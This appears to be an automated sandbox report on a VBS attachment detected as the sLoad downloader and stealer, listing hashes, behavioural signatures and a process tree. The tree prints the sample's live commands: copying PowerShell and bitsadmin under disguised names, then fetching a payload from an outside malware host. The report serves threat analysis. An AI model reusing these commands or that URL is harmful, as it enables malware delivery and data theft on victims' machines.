Overview

overview

10

Static

static

Allegato_d...4O.vbs

windows7_x64

10

Allegato_d...4O.vbs

windows10-2004_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    162s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    21-02-2022 22:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Allegato_doc_JNKMTJ64B29L424O.vbs

  • Size

    8KB

  • MD5

    5d2f707cea7e80c85d83f14213e1d7e0

  • SHA1

    6a7e4e3a532ef4cbbf77508931324a20fe79d7e2

  • SHA256

    d3d75e2f255c63ccc14496877d562f04641da53ce9bf064b1b8e4969034cce9a

  • SHA512

    beb572b51df993ed0a7464789a211d79b906387fdcceff2bcb517c98f83c933fc3513c6e707ae3b7209b1f6d618ccbd7284b17704083b8023e1c61ccf6868090

Score
10/10
sloadstealertrojan

Malware Config

Signatures

  • sLoad

    sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.

    trojanstealersload
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_JNKMTJ64B29L424O.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3272
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\fnpWSeyED.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\wjOytes*.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2572
      • C:\Windows\system32\cmd.exe
        cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\fnpWSeyED.exe
        3⤵
          PID:3996
        • C:\Windows\system32\cmd.exe
          cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\wjOytes*.exe
          3⤵
            PID:1428
        • C:\ProgramData\wjOytesin.exe
          "C:\ProgramData\wjOytesin.exe" /transfer szPZvX /download https://cxminute.com/minu/JNKMTJ64B29L424O/uk.css C:\Users\Admin\AppData\Roaming\uk.css
          2⤵
          • Executes dropped EXE
          PID:3616
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k NetworkService -p
        1⤵
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        PID:3564
      • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
        C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
        1⤵
        • Drops file in Windows directory
        • Suspicious use of AdjustPrivilegeToken
        PID:1180
      • C:\Windows\system32\MusNotifyIcon.exe
        %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
        1⤵
        • Checks processor information in registry
        PID:2364

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\wjOytesin.exe
        MD5

        f57a03fa0e654b393bb078d1c60695f3

        SHA1

        1ced6636bd2462c0f1b64775e1981d22ae57af0b

        SHA256

        c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

        SHA512

        7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

        Download Submit

      • C:\ProgramData\wjOytesin.exe
        MD5

        f57a03fa0e654b393bb078d1c60695f3

        SHA1

        1ced6636bd2462c0f1b64775e1981d22ae57af0b

        SHA256

        c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c

        SHA512

        7e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a

        Download Submit